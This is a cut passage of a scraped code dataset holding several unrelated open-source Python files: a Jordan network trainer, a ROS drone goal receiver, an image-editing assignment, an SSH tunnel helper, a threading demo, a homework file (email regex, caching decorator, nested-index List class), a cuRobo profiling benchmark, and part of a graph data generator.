[0]\n H_W2 = np.matmul(hidden_layer, W2)\n deactivated_output_layer[0] = sigma_func_def(H_W2[0])\n HL_DOL = np.matmul(np.array([hidden_layer]).T, np.array([deactivated_output_layer]))\n\n for multiplying_index in range(len(HL_DOL)):\n HL_DOL[multiplying_index] *= ALPHA\n HL_DOL[multiplying_index] *= err\n\n W2 = W2 - HL_DOL\n\n sum_err = 0\n for sample_index in range(len(learning_window) - 1):\n input_layer = np.array(learning_window[sample_index] + contexts_list[sample_index])\n hidden_layer = np.matmul(input_layer, np.array(W1))\n output_layer = np.matmul(hidden_layer, np.array(W2))\n\n contexts_list[sample_index][0] = output_layer[0]\n\n intended_outcome = learning_window[sample_index + 1][L - 1]\n err = output_layer[0] - intended_outcome\n sum_err += err ** 2\n print(\"Итерация \", current_iteration, \" \", sum_err)\n\n print(\"\\n\", str(predict_next(W1, W2, learning_window[-1])))\n\n with open(\"wm1\", 'w') as weight_matrix_file:\n np.save(\"wm1\", W1)\n with open(\"wm2\", 'w') as weight_matrix_file:\n np.save(\"wm2\", W2)\n\n # ==================================== всё остальное =======================================\n\nelse:\n W1 = np.array([])\n W2 = np.array([])\n with open(\"wm1.npy\", \"r\") as weight_matrix_file:\n W1 = np.load(\"wm1.npy\")\n with open(\"wm2.npy\", \"r\") as weight_matrix_file:\n W2 = np.load(\"wm2.npy\")\n\n X_choice = input(\"Выберите последовательность: \\n1 - ряд Фиббоначи\\n2 - Факториальная функция\\n\\n\")\n X_count = int(input(\"Выберите количество элементов в выбранной последовательности: \"))\n X = []\n row_type = \"\"\n if X_choice == '1':\n row_type = \"fib\"\n for index_of_primary_fill in range(X_count):\n X.append(1)\n for index_of_fibonacci in range(2, X_count):\n X[index_of_fibonacci] = X[index_of_fibonacci - 1] + X[index_of_fibonacci - 2]\n print(X)\n if X_choice == '2':\n row_type = \"fac\"\n for index_of_primary_fill in range(X_count):\n X.append(1)\n for index_of_factorial in range(X_count):\n X[index_of_factorial] = factorial(index_of_factorial + 1)\n print(X)\n\n learning_window = create_window(X, 7, 4)\n print(\"\\n\", str(predict_next(W1, W2, X[-5:-1])))\n","repo_name":"Nepare/MRZvIS_3_Jordan_Network","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31951907541","text":"#!/usr/bin/env python3\n# license removed for brevity\nimport rospy\nfrom sensor_msgs.msg import Image\nfrom geometry_msgs.msg import PoseStamped\nimport socket\nimport struct\nimport os\n\n\ndef talker():\n rospy.init_node('fly_recevier', anonymous=True)\n\n\n ip, port = rospy.get_param('~ardrone_ip'), rospy.get_param('~ardrone_port')\n x1, y1 = rospy.get_param('~x1'), rospy.get_param('~y1')\n x2, y2 = rospy.get_param('~x2'), rospy.get_param('~y2')\n x3, y3 = rospy.get_param('~x3'), rospy.get_param('~y3')\n\n\n tcp_server_socket = socket.socket( socket.AF_INET, socket.SOCK_STREAM )\n address = (ip, port)\n tcp_server_socket.bind(address)\n tcp_server_socket.listen(128)\n client_socket, clientAddr = tcp_server_socket.accept()\n\n pub = rospy.Publisher('/move_base_simple/goal', PoseStamped, queue_size=10)\n\n\n rate = rospy.Rate(40)\n goal_msg = PoseStamped()\n recv_data_whole = bytes()\n \n while True:\n recv_data = client_socket.recv(struct.calcsize('i')+10)\n if len(recv_data) == 0 :\n client_socket.close()\n tcp_server_socket.close()\n print('finish')\n break\n else:\n recv_data_whole += recv_data\n\n if recv_data_whole.__len__() == struct.calcsize('i'):\n flag = struct.unpack('i',recv_data_whole)\n if flag == 0:\n os.system('roslaunch ego_planner single_run_in_exp.launch')\n if flag == 1:\n goal_msg.pose.position.x = x1\n goal_msg.pose.position.y = y1\n goal_msg.pose.position.z = 1.0\n elif flag == 2:\n goal_msg.pose.position.x = x2\n goal_msg.pose.position.y = y2\n goal_msg.pose.position.z = 1.0\n elif flag == 3:\n goal_msg.pose.position.x = x3\n goal_msg.pose.position.y = y3\n goal_msg.pose.position.z = 0.0\n\n goal_msg.header.frame_id = 'world'\n\n pub.publish( goal_msg )\n client_socket.send(\"ok\".encode('utf-8'))\n recv_data_whole = bytes()\n rate.sleep()\n \n \nif __name__ == '__main__':\n try:\n talker()\n except rospy.ROSInterruptException:\n pass","repo_name":"yonggaogit/covinsuwb","sub_path":"msg_utils/scripts/receiver.py","file_name":"receiver.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14059227215","text":"\"\"\"\nFile: most_humorous_award.py\nAuthor:王偉誠\nID:0711506\n----------------------------------\nThis file creates a photoshopped image\nthat is going to compete for the 2019 Most\nHumorous Award for Introduction to Computer\nScience class in NCTUMSE.\nPlease put all the images you use in image_contest folder\nand make sure to choose which award you are aiming at\n\"\"\"\nfrom simpleimage import SimpleImage\n\n\ndef smaller(img):\n \"\"\"\n This method can change the size of the image.\n (make the image smaller.)\n \"\"\"\n blank = SimpleImage.blank(img.width // 2, img.height // 2)\n for x in range(blank.width):\n for y in range(blank.height):\n blank_pixel = blank.get_pixel(x, y)\n img_pixel = img.get_pixel(x * 2, y * 2)\n blank_pixel.red = img_pixel.red\n blank_pixel.green = img_pixel.green\n blank_pixel.blue = img_pixel.blue\n return blank\n\n\ndef no_green(img):\n \"\"\"\n This method will use the blank pixels to replace the green pixels in the image.\n \"\"\"\n blank = SimpleImage.blank(img.width, img.height)\n for x in range(img.width):\n for y in range(img.height):\n pixel = img.get_pixel(x, y)\n blank_pixel = blank.get_pixel(x, y)\n avg = (pixel.red + pixel.green + pixel.blue) // 3\n # find out the green pixels and change them to blank pixels.\n if pixel.green > avg > 40:\n pixel.red = blank_pixel.red\n pixel.green = blank_pixel.green\n pixel.blue = blank_pixel.blue\n return img\n\n\ndef blur(background):\n \"\"\"\n This method will smooth the background after making it bigger.\n \"\"\"\n blank = SimpleImage.blank(background.width, background.height)\n for x in range(blank.width):\n for y in range(blank.height):\n pixel = blank.get_pixel(x, y)\n if blank.width - 1 > x > 0 and blank.height - 1 > y > 0:\n sum_red = 0\n sum_green = 0\n sum_blue = 0\n # get the nearest pixels of the center pixel.\n for i in range(x - 1, x + 2):\n for j in range(y - 1, y + 2):\n old_9_pixel = background.get_pixel(i, j)\n sum_red += old_9_pixel.red\n sum_green += old_9_pixel.green\n sum_blue += old_9_pixel.blue\n # calculate the average RGB value of the 9 pixels.\n avg_red = sum_red // 9\n avg_green = sum_green // 9\n avg_blue = sum_blue // 9\n # change the RGB value of the center pixel.\n pixel.red = avg_red\n pixel.green = avg_green\n pixel.blue = avg_blue\n return blank\n\n\ndef bigger(background):\n \"\"\"\n This method can change the size of the background.\n (make the background bigger.)\n \"\"\"\n blank = SimpleImage.blank(background.width * 3, background.height * 3)\n for x in range(blank.width):\n for y in range(blank.height):\n blank_pixel = blank.get_pixel(x, y)\n background_pixel = background.get_pixel(x // 3, y // 3)\n blank_pixel.red = background_pixel.red\n blank_pixel.green = background_pixel.green\n blank_pixel.blue = background_pixel.blue\n return blank\n\n\ndef ps(img, background):\n \"\"\"\n This method will copy the img1 and paste it to the background,\n and the result will be funny.\n If it runs correctly, the face of img1 will be pasted to the board of the background.\n \"\"\"\n for x in range(0, background.width):\n for y in range(0, background.height):\n background_pixel = background.get_pixel(x, y)\n background_avg = (background_pixel.red + background_pixel.green + background_pixel.blue) // 3\n if img.width + 100 > x >= 100 and y < img.height:\n img_pixel = img.get_pixel(x - 100, y)\n img_avg = (img_pixel.red + img_pixel.green + img_pixel.blue) // 3\n if 225 > background_avg > 210 and img_avg < 255:\n background_pixel.red = img_pixel.red\n background_pixel.green = img_pixel.green\n background_pixel.blue = img_pixel.blue\n return background\n\n\ndef main():\n \"\"\"\n This program will copy the img1 without green pixels, and then\n paste it to the background.\n After running this program, The face of img1 will on the board of the background.\n \"\"\"\n background = SimpleImage(\"image_contest/background.jpg\")\n background = bigger(background)\n background = blur(background)\n img = SimpleImage(\"image_contest/img1.jpg\")\n img = no_green(img)\n img = smaller(img)\n final = ps(img, background)\n final.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"skyline9981/Introduction-to-Computers","sub_path":"Assignment4/Assignment4/most_humorous_award.py","file_name":"most_humorous_award.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18634653590","text":"from sshtunnel import SSHTunnelForwarder\nimport logging\n\n\ndef start_server(remote_user, remote_host, remote_port, local_host, local_port, private_key, gateway, config_file):\n \"\"\"\n Starting server for the tunnel from local to the given environment\n \"\"\"\n server = SSHTunnelForwarder(\n ssh_address_or_host=gateway,\n ssh_config_file=config_file,\n ssh_username=remote_user,\n ssh_private_key=private_key,\n remote_bind_address=(remote_host, int(remote_port)),\n local_bind_address=(local_host, int(local_port)),\n )\n\n server.start()\n logging.info(\"tunnel open now\")\n return server\n\n\ndef stop_server(server):\n \"\"\"\n Shutting tunnel down\n :param server:\n :return:\n \"\"\"\n server.stop()\n logging.info(\"tunnel closed\")\n","repo_name":"GoyalYatin/Python-Robot-Libraries","sub_path":"src/ssh_tunnel.py","file_name":"ssh_tunnel.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40959488076","text":"import threading, time\nfrom threading import Thread, Condition\n\ng_count = 0 # 전역변수는 자동으로 스레드의 공유자원이 됨\nlock = Condition() # 스레드 공유자원 접근에 제한을 강제하기 의한 잠금 객체\n\ndef threadCount(id,count):\n global g_count\n \n for i in range(count):\n lock.acquire()\n print('id %s==>count:%s, g_count:%s'%(id, i, g_count))\n g_count += 1\n lock.release()\n\nfor i in range(1,6):\n Thread(target = threadCount, args = (i, 5)).start()\n\ntime.sleep(1)\n\nprint('최종 g_count :', g_count)\nprint('bye')","repo_name":"LEESEUNGJUNE1/Python","sub_path":"pypro1/pack6network/test47lock.py","file_name":"test47lock.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"44233917612","text":"\"\"\"\nScript: utils.py\nAuthor: chinmaib\n\"\"\"\nimport os\nimport sys\nimport numpy as np\nimport math\n\ndef test1():\n x = np.random.randint(0,10,(5,5))\n print (x)\n\ndef calculate_MCC (cmat, n):\n \"\"\"\n Function calculates the Matthew's Correlation Coefficient for\n given confusion matrix cmat and total number of labels n.\n \"\"\" \n # True distribution of labels\n t_k = np.sum(cmat,axis=1)\n # Predicted distribution of labels\n p_k = np.sum(cmat,axis=0)\n #print (t_k)\n #print (p_k)\n # Total correctly predicted.\n # Sum of diagonal elements in the confusion matrix\n c = np.trace(cmat)\n print ('Correct c:',c)\n s = cmat.sum()\n s2 = s ** 2\n print ('Total s:',s)\n c_times_s = c * s\n sig_pk_times_tk = 0\n sig_pk2 = 0\n sig_tk2 = 0\n\n for i in range(0,n):\n temp = t_k[i] * p_k[i]\n sig_tk2 += t_k[i]**2\n sig_pk2 += p_k[i]**2\n\n sig_pk_times_tk += temp\n #print (temp)\n\n print ('Sum p_k times t_k:',sig_pk_times_tk)\n print ('s^2:',s2)\n print ('Sum t_k^2:',sig_tk2)\n print ('Sum p_k^2:',sig_pk2)\n\n MCC = ((c * s) - sig_pk_times_tk)/math.sqrt((s2 - sig_pk2)*(s2 - sig_tk2))\n print ('MCC:', MCC)\n\n","repo_name":"chinmaib/multitimescale","sub_path":"Study3_Analysis/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33498404555","text":"import re\n\ndef print_emails(sfile):\n \"\"\" Prints the valid emails in a list, and then the not valid ones.\n >>> print_emails(\"hw-week3//emails.txt\")\n valid:\n abc_def@mail.com\n aa@ma-il.cc\n a.a_xc-ks@mail.cc\n a@mail.cc\n aa@mail.cc\n abc-d@mail.com\n Leorabach@gmail.com\n Leorab.ach@gmail.com\n not valid:\n _aa@mail.cc\n abc-@mail.com\n abc..def@mail.com\n Leorabach@gmail.c\n .abc@mail.com\n abc#def@mail.com\n L$e%o@r#abach@gmail.com\n \"\"\"\n with open(sfile, 'r') as file:\n s = file.read()\n lst = [s.split(\" \")]\n valid = []\n n_valid = []\n for l in lst:\n for s in l:\n query = re.match(r\"[a-zA-Z0-9]+([._-][a-zA-Z0-9]+)*@[a-zA-Z0-9]+(-[a-zA-Z0-9]+)*[.][a-zA-Z0-9]{2,}\\b\", s, flags=0)\n if query is not None:\n valid.append(query.group())\n else:\n query = re.match(r\"\\S*\",s,flags=0)\n if query.group() != '':\n n_valid.append(query.group())\n\n print(\"valid:\")\n for s in valid:\n print(s)\n\n print(\"not valid:\")\n for s in n_valid:\n print(s)\n\nimport math\nfrom pyclbr import Function\nfrom typing import Any\n\ndef lastcall(func: Function):\n \"\"\"\n The decorator returns the function with its answer, if it wasn't called with that parameter yet.\n Otherwise, it prints a message that it already was called.\n >>> print_type(\"S\")\n S is a 'str'\n >>> print_type(\"S\")\n I already told you that the answer is None!\n >>> print(pow2(2))\n 4\n >>> pow2(2)\n I already told you that the answer is 4!\n >>> print_type(2)\n 2 is a 'int'\n >>> print(pow2(10))\n 100\n >>> pow2(2)\n I already told you that the answer is 4!\n >>> pow2(10)\n I already told you that the answer is 100!\n \n \"\"\"\n dic = {} # An empty dictionary for checking if the parameter and the function were called already.\n def wrapper(x):\n if (x,func) in dic.keys():\n print(\"I already told you that the answer is \"+str(dic[(x,func)])+\"!\")\n else:\n dic[(x,func)]= func(x)\n return dic[(x,func)]\n return wrapper\n\n@lastcall\ndef pow2(x: float):\n return x**2\n\n@lastcall\ndef powx(x: float):\n return x**x\n\n@lastcall\ndef print_type(x: Any):\n s = str(type(x))\n print(str(x) + \" is a \" + s[7:len(s)-1])\n\n@lastcall\ndef loge(x: int):\n return math.log(x)\n\n@lastcall\ndef log2(x: int):\n return math.log2(x)\n\n@lastcall\ndef log10(x: int):\n return math.log10(x)\n\n# print_emails(\"hw-week3//emails.txt\")\n# print_type(\"S\")\n# print_type(\"S\")\n# print(pow2(2))\n# pow2(2)\n# print_type(2)\n# print(pow2(10))\n# pow2(2)\n# pow2(10)\n\n\nclass List(list):\n \"\"\"\n Class of List, allows to apply with one and more indexes to the [] operator, while to list it has to be exactly one intex.\n >>> print(List([[[1,2,3,33],[4,5,6,66]], [[7,8,9,99],[10,11,12,122]], [[13,14,15,155],[16,17,18,188]], ] )[0,1,3])\n 66\n >>> print(List([[[1,2,3,33],[4,5,6,66]], [[7,8,9,99],[10,11,12,122]], [[13,14,15,155],[16,17,18,188]], ] )[0])\n [[1,2,3,33],[4,5,6,66]]\n \"\"\"\n def __init__(self, lst):\n self.lists = []\n self.len = 0\n for i in range(len(lst)):\n if type(lst[i]) == list:\n self.lists.append(List(lst[i]))\n else:\n self.lists.append(lst[i])\n\n def __setitem__(self, *arg, value: object):\n print(\"setitem\")\n if len(arg) == 1:\n self.lists[arg] = value\n else:\n self.lists[arg[0]][arg[1:]] = value\n\n def __getitem__(self, *arg):\n if type(arg[0]) == int:\n return self.lists[arg[0]]\n elif len(arg[0]) == 1:\n return self.lists[arg[0][0]]\n else:\n return self.lists[arg[0][0]][arg[0][1:]]\n \n\n\n def __str__(self):\n s = \"[\"\n for i in range(len(self.lists)):\n s += str(self.lists[i]) + \",\"\n return s[:-1] + \"]\"\n\n def __len__(self):\n return self.len\n\n \n\n\nif __name__ == '__main__':\n import doctest\n print(doctest.testmod())\n","repo_name":"leorasc/Program-academic-research","sub_path":"hw-week3/hw3.py","file_name":"hw3.py","file_ext":"py","file_size_in_byte":4128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5955010479","text":"import time\nfrom typing import Any, Dict, List\n\n# Third Party\nimport numpy as np\nimport torch\nimport torch.autograd.profiler as profiler\nfrom nvblox_torch.datasets.sun3d_dataset import Sun3dDataset\nfrom robometrics.datasets import demo_raw\nfrom torch.profiler import ProfilerActivity, profile, record_function\nfrom tqdm import tqdm\n\n# CuRobo\nfrom curobo.geom.sdf.world import CollisionCheckerType, WorldConfig\nfrom curobo.geom.types import Mesh\nfrom curobo.types.math import Pose\nfrom curobo.types.state import JointState\nfrom curobo.util.logger import setup_curobo_logger\nfrom curobo.util_file import (\n get_assets_path,\n get_robot_configs_path,\n get_task_configs_path,\n get_world_configs_path,\n join_path,\n load_yaml,\n)\nfrom curobo.wrap.reacher.motion_gen import MotionGen, MotionGenConfig, MotionGenPlanConfig\n\n# torch.set_num_threads(8)\n# ttorch.use_deterministic_algorithms(True)\ntorch.manual_seed(0)\n\ntorch.backends.cudnn.benchmark = True\n\ntorch.backends.cuda.matmul.allow_tf32 = True\ntorch.backends.cudnn.allow_tf32 = True\nnp.random.seed(10)\n# Third Party\nfrom nvblox_torch.datasets.mesh_dataset import MeshDataset\n\n# CuRobo\nfrom curobo.types.camera import CameraObservation\n\n\ndef load_curobo(n_cubes: int, enable_log: bool = False):\n robot_cfg = load_yaml(join_path(get_robot_configs_path(), \"franka.yml\"))[\"robot_cfg\"]\n robot_cfg[\"kinematics\"][\"collision_sphere_buffer\"] = -0.0\n motion_gen_config = MotionGenConfig.load_from_robot_config(\n robot_cfg,\n \"collision_nvblox_online.yml\",\n trajopt_tsteps=32,\n collision_checker_type=CollisionCheckerType.BLOX,\n use_cuda_graph=False,\n position_threshold=0.005,\n rotation_threshold=0.05,\n num_ik_seeds=30,\n num_trajopt_seeds=12,\n interpolation_dt=0.02,\n store_ik_debug=enable_log,\n store_trajopt_debug=enable_log,\n )\n mg = MotionGen(motion_gen_config)\n mg.warmup(enable_graph=False)\n # print(\"warmed up\")\n # exit()\n return mg\n\n\ndef benchmark_mb(write_usd=False, save_log=False):\n robot_cfg = load_yaml(join_path(get_robot_configs_path(), \"franka.yml\"))[\"robot_cfg\"]\n spheres = robot_cfg[\"kinematics\"][\"collision_spheres\"]\n if isinstance(spheres, str):\n spheres = load_yaml(join_path(get_robot_configs_path(), spheres))[\"collision_spheres\"]\n\n plan_config = MotionGenPlanConfig(\n max_attempts=1,\n enable_graph_attempt=3,\n enable_finetune_trajopt=True,\n partial_ik_opt=False,\n enable_graph=False,\n )\n # load dataset:\n\n file_paths = [demo_raw]\n all_files = []\n for file_path in file_paths:\n all_groups = []\n\n problems = file_path()\n\n for key, v in tqdm(problems.items()):\n # if key not in [\"table_under_pick_panda\"]:\n # continue\n scene_problems = problems[key] # [:2]\n n_cubes = check_problems(scene_problems)\n mg = load_curobo(n_cubes, save_log)\n m_list = []\n i = 1\n for problem in tqdm(scene_problems, leave=False):\n q_start = problem[\"start\"]\n pose = (\n problem[\"goal_pose\"][\"position_xyz\"] + problem[\"goal_pose\"][\"quaternion_wxyz\"]\n )\n\n # reset planner\n mg.reset(reset_seed=False)\n world = WorldConfig.from_dict(problem[\"obstacles\"]).get_mesh_world(\n merge_meshes=True\n )\n # clear cache:\n mesh = world.mesh[0].get_trimesh_mesh()\n mg.clear_world_cache()\n obs = []\n # get camera_observations:\n save_path = \"benchmark/log/nvblox/\" + key + \"_\" + str(i)\n\n m_dataset = Sun3dDataset(save_path)\n\n # m_dataset = MeshDataset(\n # None, n_frames=200, image_size=640, save_data_dir=None, trimesh_mesh=mesh\n # )\n obs = []\n tensor_args = mg.tensor_args\n for j in range(len(m_dataset)):\n with profiler.record_function(\"nvblox/create_camera_images\"):\n data = m_dataset[j]\n cam_obs = CameraObservation(\n rgb_image=tensor_args.to_device(data[\"rgba\"]),\n depth_image=tensor_args.to_device(data[\"depth\"]),\n intrinsics=data[\"intrinsics\"],\n pose=Pose.from_matrix(data[\"pose\"].to(device=mg.tensor_args.device)),\n )\n obs.append(cam_obs)\n with profile(activities=[ProfilerActivity.CPU, ProfilerActivity.CUDA]) as prof:\n for j in range(len(obs)):\n cam_obs = obs[j]\n cam_obs.rgb_image = None\n with profiler.record_function(\"nvblox/add_camera_images\"):\n mg.add_camera_frame(cam_obs, \"world\")\n\n with profiler.record_function(\"nvblox/process_camera_images\"):\n mg.process_camera_frames(\"world\", False)\n mg.world_coll_checker.update_blox_hashes()\n\n # run planner\n start_state = JointState.from_position(mg.tensor_args.to_device([q_start]))\n result = mg.plan_single(\n start_state,\n Pose.from_list(pose),\n plan_config,\n )\n print(\"Exporting the trace..\")\n prof.export_chrome_trace(\"benchmark/log/trace/motion_gen_nvblox.json\")\n print(result.success, result.status)\n exit()\n\n\ndef get_metrics_obstacles(obs: Dict[str, List[Any]]):\n obs_list = []\n if \"cylinder\" in obs and len(obs[\"cylinder\"].items()) > 0:\n for _, vi in enumerate(obs[\"cylinder\"].values()):\n obs_list.append(\n Cylinder(\n np.ravel(vi[\"pose\"][:3]), vi[\"radius\"], vi[\"height\"], np.ravel(vi[\"pose\"][3:])\n )\n )\n if \"cuboid\" in obs and len(obs[\"cuboid\"].items()) > 0:\n for _, vi in enumerate(obs[\"cuboid\"].values()):\n obs_list.append(\n Cuboid(np.ravel(vi[\"pose\"][:3]), np.ravel(vi[\"dims\"]), np.ravel(vi[\"pose\"][3:]))\n )\n return obs_list\n\n\ndef check_problems(all_problems):\n n_cube = 0\n for problem in all_problems:\n cache = WorldConfig.from_dict(problem[\"obstacles\"]).get_obb_world().get_cache_dict()\n n_cube = max(n_cube, cache[\"obb\"])\n return n_cube\n\n\nif __name__ == \"__main__\":\n setup_curobo_logger(\"error\")\n benchmark_mb()\n","repo_name":"NVlabs/curobo","sub_path":"benchmark/curobo_nvblox_profile.py","file_name":"curobo_nvblox_profile.py","file_ext":"py","file_size_in_byte":6737,"program_lang":"python","lang":"en","doc_type":"code","stars":331,"dataset":"github-code","pt":"54"} +{"seq_id":"6912951762","text":"# 4. Find the largest and smallest number from a given list.\r\n\r\n#creating empty list\r\nlist = []\r\n\r\n#user defined input - length of the list\r\nnum = int(input(\"Enter number of elements in the list: \"))\r\n\r\nfor i in range(1, num + 1):\r\n value = int(input(\"Please enter the Value of %d Element : \" %i))\r\n list.append(value)\r\n\r\nprint(\"The Smallest Element in this List is : \", min(list))\r\nprint(\"The Largest Element in this List is : \", max(list))\r\n\r\n","repo_name":"gandhalik/PythonCA2020-Assignments","sub_path":"Task 3/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32716973004","text":"from collections import OrderedDict\nfrom itertools import islice\n\nimport networkx as nx\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\n\nfrom moge.generator.sequences import MultiSequenceTokenizer\nfrom moge.network.hetero import HeteroNetwork\nfrom .subgraph_generator import SubgraphGenerator\n\n\nclass MultiplexGenerator(SubgraphGenerator, MultiSequenceTokenizer):\n def __init__(self, network: HeteroNetwork, variables: list = [], targets: list = None,\n batch_size=500, traversal='neighborhood', traversal_depth=2, sampling=\"log\", n_steps=100,\n maxlen=1400, padding='post', truncating='post', agg_mode=False, tokenizer=None,\n replace=True, seed=0, verbose=True, **kwargs):\n\n super(MultiplexGenerator, self).__init__(network=network,\n variables=variables, targets=targets,\n batch_size=batch_size,\n traversal=traversal, traversal_depth=traversal_depth,\n sampling=sampling,\n n_steps=n_steps,\n directed=None, maxlen=maxlen,\n padding=padding, truncating=truncating,\n agg_mode=agg_mode, tokenizer=tokenizer,\n replace=replace, seed=seed, verbose=verbose,\n **kwargs)\n\n def get_output_types(self):\n return (\n {\"MicroRNA_seqs\": tf.int8, \"MessengerRNA_seqs\": tf.int8, \"LncRNA_seqs\": tf.int8, \"Protein_seqs\": tf.int8,\n \"MicroRNA-MessengerRNA\": tf.float32, \"MicroRNA-LncRNA\": tf.float32, \"LncRNA-MessengerRNA\": tf.float32,\n \"Protein-Protein\": tf.float32},) + \\\n (tf.int64, # y\n tf.bool) # idx_weights\n\n def get_output_shapes(self):\n return ({\"MicroRNA_seqs\": tf.TensorShape([self.batch_size, None]),\n \"MessengerRNA_seqs\": tf.TensorShape([self.batch_size, None]),\n \"LncRNA_seqs\": tf.TensorShape([self.batch_size, None]),\n \"Protein_seqs\": tf.TensorShape([self.batch_size, None]),\n \"MicroRNA-MessengerRNA\": tf.TensorShape([self.batch_size, self.batch_size]),\n \"MicroRNA-LncRNA\": tf.TensorShape([self.batch_size, self.batch_size]),\n \"LncRNA-MessengerRNA\": tf.TensorShape([self.batch_size, self.batch_size]),\n \"Protein-Protein\": tf.TensorShape([self.batch_size, self.batch_size])},) + \\\n (tf.TensorShape([self.batch_size, None]), # y\n tf.TensorShape((self.batch_size))) # idx_weights\n\n def process_normalized_node_degree(self, network):\n self.node_degrees = pd.Series(0, index=self.node_list)\n for modality, network_layer in network.networks.items():\n layer_node_degrees = pd.Series(dict(network_layer.degree(self.node_list)))\n layer_node_degrees = layer_node_degrees / layer_node_degrees.std()\n\n self.node_degrees[layer_node_degrees.index] = self.node_degrees[\n layer_node_degrees.index] + layer_node_degrees\n self.node_degrees = self.node_degrees.to_dict()\n\n self.node_degrees_list = [self.node_degrees[node] if node in self.node_degrees else 0 for node in\n self.node_list]\n self.node_sampling_freq = self.normalize_node_degrees(self.node_degrees_list,\n compression=self.sampling)\n print(\"# of nodes to sample from (non-zero degree):\",\n np.count_nonzero(self.node_sampling_freq)) if self.verbose else None\n assert len(self.node_sampling_freq) == len(self.node_list)\n\n def node_sampling(self, batch_size):\n sampled_nodes = self.sample_seed_node(batch_size).tolist()\n\n while len(sampled_nodes) < batch_size:\n add_nodes = self.sample_seed_node(batch_size - len(sampled_nodes)).tolist()\n sampled_nodes = list(OrderedDict.fromkeys(sampled_nodes + add_nodes))\n return sampled_nodes\n\n def bfs_traversal(self, batch_size, seed_node=None):\n sampled_nodes = []\n\n while len(sampled_nodes) < batch_size:\n if seed_node is None or seed_node not in self.node_list:\n start_node = self.sample_seed_node(1)[0]\n else:\n start_node = seed_node\n\n successor_nodes = []\n for modality, network_layer in self.network.networks.items():\n if start_node not in network_layer.nodes:\n continue\n layer_neighbors = [node for source, successors in\n islice(nx.traversal.bfs_successors(network_layer, source=start_node),\n self.traversal_depth) for node in successors]\n\n if len(layer_neighbors) > batch_size / len(self.network.networks):\n layer_neighbors = layer_neighbors[:int(batch_size / len(self.network.networks))]\n successor_nodes.extend(layer_neighbors)\n\n sampled_nodes.extend([start_node] + successor_nodes)\n sampled_nodes = list(OrderedDict.fromkeys(sampled_nodes))\n\n if len(sampled_nodes) > batch_size:\n np.random.shuffle(sampled_nodes)\n sampled_nodes = sampled_nodes[:batch_size]\n return sampled_nodes\n\n def dfs_traversal(self, batch_size, seed_node=None):\n sampled_nodes = []\n\n while len(sampled_nodes) < batch_size:\n if seed_node is None or seed_node not in self.node_list:\n start_node = self.sample_seed_node(1)[0]\n else:\n start_node = seed_node\n\n successor_nodes = []\n for modality, network_layer in self.network.networks.items():\n if start_node not in network_layer.nodes:\n continue\n layer_neighbors = list(\n islice(nx.traversal.dfs_successors(network_layer, source=start_node), batch_size))\n\n if len(layer_neighbors) > batch_size / len(self.network.networks):\n layer_neighbors = layer_neighbors[:int(batch_size // len(self.network.networks))]\n successor_nodes.extend(layer_neighbors)\n\n sampled_nodes.extend([start_node] + successor_nodes)\n sampled_nodes = list(OrderedDict.fromkeys(sampled_nodes))\n\n if len(sampled_nodes) > batch_size:\n np.random.shuffle(sampled_nodes)\n sampled_nodes = sampled_nodes[:batch_size]\n return sampled_nodes\n\n def __getitem__(self, item=None):\n sampled_nodes = self.traverse_network(batch_size=self.batch_size)\n X, y, idx_weights = self.__getdata__(sampled_nodes, variable_length=False)\n\n return X, y, idx_weights\n\n def __getdata__(self, sampled_nodes, variable_length=False, training=True):\n # Features\n X = {}\n for modality in self.network.node_types:\n X[\"_\".join([modality, \"seqs\"])] = self.get_sequence_encodings(sampled_nodes, modality=modality,\n variable_length=variable_length or self.variable_length,\n minlen=40)\n for variable in self.variables:\n if \"expression\" == variable:\n X[\"_\".join([modality, variable])] = self.get_expressions(sampled_nodes, modality=modality)\n else:\n labels_vector = self.annotations[modality].loc[sampled_nodes, variable]\n labels_vector = self.process_label(labels_vector)\n X[\"_\".join([modality, variable])] = self.network.feature_transformer[variable].transform(\n labels_vector)\n\n for layer, network_layer in self.network.networks.items():\n layer_key = \"-\".join(layer)\n X[layer_key] = self.network.get_adjacency_matrix(edge_types=layer, node_list=sampled_nodes,\n method=self.method,\n output=self.adj_output)\n\n # Labels\n target_labels = self.network.all_annotations.loc[sampled_nodes, self.targets[0]]\n target_labels = self.process_label(target_labels)\n\n y = self.network.feature_transformer[self.targets[0]].transform(target_labels)\n if self.sparse_target is 1 and training:\n y = self.label_sparsify(y)[[0]] # Select only a single label\n elif self.sparse_target is True and training:\n y = self.label_sparsify(y) # Select all multilabels\n\n # Get a vector of nonnull indicators\n idx_weights = self.network.all_annotations.loc[sampled_nodes, self.targets].notnull().any(axis=1).values * 1\n\n assert len(sampled_nodes) == y.shape[0]\n return X, y, idx_weights\n\n def load_data(self, connected_nodes_only=True, dropna=True, y_label=None, variable_length=False):\n if connected_nodes_only:\n node_list = self.get_connected_nodelist()\n else:\n node_list = self.network.node_list\n\n if dropna:\n node_list = self.network.all_annotations.loc[node_list, self.targets].dropna().index.tolist()\n else:\n node_list = node_list\n\n X, y, idx_weights = self.__getdata__(node_list, variable_length=variable_length, training=False)\n\n if y_label:\n y_labels = self.get_node_labels(y_label, node_list=node_list)\n return X, y_labels\n\n y = pd.DataFrame(y, index=node_list,\n columns=self.network.feature_transformer[self.targets[0]].classes_)\n\n return X, y, 